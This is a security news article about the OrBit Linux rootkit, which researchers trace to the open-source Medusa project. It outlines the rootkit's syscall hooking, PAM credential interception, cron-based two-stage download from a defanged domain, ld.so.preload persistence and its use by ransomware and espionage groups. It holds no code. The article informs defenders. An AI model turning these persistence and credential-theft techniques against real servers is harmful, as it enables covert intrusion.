Unmasking OrBit: How a Copied Open-Source Rootkit Stealthily Compromised Linux Servers for Years
Do Son 
The Linux malware known as OrBit, which has surreptitiously compromised servers and exfiltrated credentials for nearly four years, has been revealed to be far from a unique cryptographic creation. Researchers from Intezer have determined that threat actors have spent years deploying a slightly modified iteration of Medusa, an open-source project published on GitHub in 2022. Over this epoch, the malware has integrated into the arsenals of disparate cybercriminal syndicates, encompassing both ransomware operators and state-sponsored espionage campaigns.
When initially documented in the summer of 2022, OrBit was characterized as a sophisticated Linux rootkit that hooks system libraries, obscures processes, files, and network sockets, and intercepts credentials handled by SSH and sudo. Rather than establishing outbound telemetry with a command-and-control server, adversaries accessed compromised hosts natively via an embedded SSH backdoor. The malware cloaked its own presence by manipulating more than forty Linux system calls.
A recent forensic audit of dozens of OrBit artifacts uploaded to VirusTotal between 2022 and 2026 revealed two primary structural lineages. The first, designated as Lineage A, features an exhaustive operational suite: credential harvesting, network activity obfuscation, log evasion, and traffic interception. Conversely, Lineage B represents a streamlined iteration, stripped of certain features such as PAM authentication interception, TCP port concealing, and network packet sniffing to minimize its footprint and systemic visibility.
Throughout its evolutionary cycle, operators routinely rotated hardcoded credentials, installation vectors, and string encryption keys. Certain iterations contained provocatively named directories like /lib/fuckwhitehatshome/, while others masqueraded as legitimate Linux system pathways.
In 2023, developers introduced the xread function, enabling the malware to bypass its own system call hooks and prevent the destabilization of utilities like Git. Absent this refinement, systemic anomalies in network connections and file access risked betraying the rootkit’s presence.
By 2025, OrBit received an ominous update, acquiring the ability to tamper with server-side PAM authentication via the pam_sm_authenticate routine. This mechanism empowered adversaries to not merely harvest credentials, but to autonomously authorize or obstruct system access.
Concurrently, a novel infection vector manifested. Replacing the rudimentary installer, operators deployed a two-stage downloader. The primary stage compromised ELF binaries and established persistent cron jobs to fetch secondary payloads from the domain cf0[.]pw. The secondary stage then anchored the rootkit utilizing ld.so.preload. This architectural shift effectively endowed OrBit with its first comprehensive remote administration capability.
Security researchers further established an architectural bridge between this new OrBit downloader and the RHOMBUS botnet, which was initially observed in 2020. Both variants utilized an identical framework and leveraged the same command domain to pull payloads.
OrBit’s proliferation across prominent threat profiles has fueled intense analytical interest. Intelligence from CrowdStrike indicates that the BLOCKADE SPIDER syndicate deployed the malware to secure a stealthy foothold within VMware environments prior to unleashing Embargo ransomware. Concurrently, Mandiant reports document the identical toolkit being weaponized by the Chinese espionage nexus UNC3886 against Juniper and VMware infrastructures.
Ultimately, source-code analysis demonstrates that nearly all of OrBit’s “innovations” were natively present in the open-source Medusa project since its inception. The operators merely toggled desired modules during compilation. Investigators concluded that OrBit’s evolution closely mirrors the modular configuration of a pre-existing toolkit rather than organic malware development.
Intriguingly, the inaugural OrBit sample predated Medusa’s public GitHub release by several months. This anomaly suggests that the authors either possessed pre-release access to the codebase or that the software circulated within an exclusive, restricted cadre of operators long before its public debut.
Donate